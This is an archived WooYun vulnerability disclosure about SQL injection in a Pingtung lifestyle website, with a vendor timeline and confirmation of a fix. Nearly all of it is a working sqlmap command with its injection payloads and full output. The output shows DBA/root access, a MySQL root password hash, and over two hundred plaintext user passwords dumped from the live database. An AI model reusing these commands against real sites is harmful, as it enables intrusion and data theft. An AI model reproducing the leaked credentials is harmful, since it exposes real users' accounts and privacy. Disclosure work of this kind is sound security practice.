乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-25: 细节已通知厂商并且等待厂商处理中 2015-11-27: 厂商已经确认,细节仅向厂商公开 2015-12-07: 细节向核心白帽子及相关领域专家公开 2015-12-17: 细节向普通白帽子公开 2015-12-27: 细节向实习白帽子公开 2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开
屏東生活主站存在SQL植入漏洞(DBA權限|root密碼泄露|大量用戶明文密碼泄露)
地址:http://**.**.**.**/foods/index.php?cityid=5
$ python sqlmap.py -u "http://**.**.**.**/foods/index.php?cityid=5" -p cityid --technique=BE --random-agent --batch --current-user --is-dba --users --passwords --count --search -C pass
---Parameter: cityid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cityid=5 AND 8239=8239 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0current user: 'root@localhost'current user is DBA: Truedatabase management system users [4]:[*] ''@'localhost'[*] ''@'localhost.localdomain'[*] 'root'@'localhost'[*] 'root'@'localhost.localdomain'database management system users password hashes:[*] root [2]: password hash: 5b57dbc612de8c44 password hash: NULLDatabase: ptnet+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| ad3 | 103266 || main | 43597 || service | 10148 || blog | 1171 || country | 365 || submain | 296 || `user` | 205 || title | 151 || talk | 115 || city | 25 || ad2 | 21 || showgoods | 20 || mapdata | 16 || showclass1 | 14 || ad | 13 || class | 12 || showclass | 10 || talkclass | 4 || admin | 1 || pic | 1 || showshop | 1 |+---------------------------------------+---------+Database: webinfo+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| main | 10912 || `pad` | 4144 || ad3 | 858 || city | 20 || ad2 | 19 || service | 16 || ad | 13 || admin | 1 || class | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 553 || COLLATION_CHARACTER_SET_APPLICABILITY | 126 || COLLATIONS | 126 || STATISTICS | 79 || KEY_COLUMN_USAGE | 76 || TABLES | 67 || TABLE_CONSTRAINTS | 56 || USER_PRIVILEGES | 52 || CHARACTER_SETS | 36 || SCHEMA_PRIVILEGES | 28 || SCHEMATA | 5 |+---------------------------------------+---------+Database: mysql+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| `user` | 4 || db | 2 |+---------------------------------------+---------+columns LIKE 'pass' were found in the following databases:Database: ptnetTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: ptnetTable: user[1 column]+----------+| Column |+----------+| password |+----------+Database: webinfoTable: admin[1 column]+----------+| Column |+----------+| password |+----------+Database: mysqlTable: user[1 column]+----------+| Column |+----------+| Password |+----------+Database: ptnetTable: admin[1 entry]+----------+| password |+----------+| admin |+----------+Database: ptnetTable: user[205 entries]+--------------+| password |+--------------+| 03150315 || 0516 || 12010214 || 122550 || 123456 || 123xD || 1Qvrwx || 1hwMD || 1jVt3j || 1vp6rD || 224466abc || 28825252 || 28825252 || 28825252 || 2cF3X || 2sCNzo || 38897687 || 3IliJ || 3ilRu || 3ygyZ || 4DQwOMkN || 4dN4wY || 5601 || 5fxoTf || 60044287 || 60OqRV || 632178 || 649626 || 6BhWD || 701017 || 7800690 || 78910 || 7wxvZh || 891021 || 8KT87m || 8T5Pch || 9543b || 9KalF8 || 9Qr6l || 9ZKzH || A8IiD7I9 || AFFZO7811 || ARnxx || B3NHa || BizJAQ || D1AM53 || DyFuH || E4waO || EuwfgA || ExNNK || FAI9x || FvArcs || GakHZV || GnDWc || IbilBl || JBuF5 || JoB7c || Kq46R || LyuqMn || M8CGT || ME7aw || NO9wgj || NsTdqBWo || O4IeE || O5b4UL || OJIvg || P25dHR || PjlkH || Ps6oI || PtCsv || QTUD45 || QarfjW || Qw2DN || RWVdk || Rupbw || SPcsQ || SUFFER || Sv0nyA || SzqFY || U3ASRr || UanCPm || UfoNp || V28MVm || VWBka || W0DmFD || WZuohy || WdnKxp || WrzP8 || XEPZogDI || XPefVU || XegaSd || Y1joG || ZNMfA7 || a123456 || aa7896616 || admin168 || an4b2p || anOP59gk || bHdCe || bepK3x || bpUDGM || cGFdP || cMxpZK || cODBGM || ck672516 || coa628816 || coffee || cy7eMf || dwc0Vk || e1QeS || eItVk || egFLmO || eric11688 || ewxoB || fFQkE || fUFzY || ffzrK || fjj4Rv || fxJOc || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || g00dPa$$w0rD || gA1E7GOf || gD6bZX || gSymXc || gbzj7i || gcqRo || gianA || gofQsj || hMD20 || iA7Bf || ii87034 || imsZd || j3jeHQ || jCCUD || jH695G || jIkFU || jO1yj || juses || kWdfJE || kf4SoE || khJNZV || kyu0S || l2PO3o || l6sc1l || lDV3T || lh9y3 || mE3pH || mQvgO || mo07141009 || mxDn9T || n131419 || nGlJ6 || nYIzN || noqqIx || nxO8ZM || oO2ESP || ol55Y || pHn2d || pt11688 || pt369723 || ptlife168 || qGPqwR || qZFjSa || qm7cYp || rGBdp || rSwtIT || rbLXJj || sFgN5O || sd123456 || t0937112439 || tJQRkk || tRpxST || tgdc3371map || tmNGYS || ts99772041 || uFmwM || user || vuYH6 || wqowT0 || x35QU9 || xV2zL || y1981700513 || y1981700513 || yZeATb || ysXPOb || z0WqKK || z8pkxr || z9hgp || zBg6yX |+--------------+Database: webinfoTable: admin[1 entry]+----------+| password |+----------+| admin |+----------+Database: mysqlTable: user[4 entries]+------------------+| Password |+------------------+| 5b57dbc612de8c44 || 5b57dbc612de8c44 |||+------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: cityid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: cityid=5 AND 8239=8239 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cityid=5 AND (SELECT 7499 FROM(SELECT COUNT(*),CONCAT(0x716a706a71,(SELECT (ELT(7499=7499,1))),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0Database: ptnetTable: ad3[10 columns]+------------+| Column |+------------+| adclass || adid || adname || adtime || classid || pic || pid || state || subclassid || url |+------------+
上WAF。
危害等级:高
漏洞Rank:17
确认时间:2015-11-27 23:14
感謝通報
2016-01-05:確認修復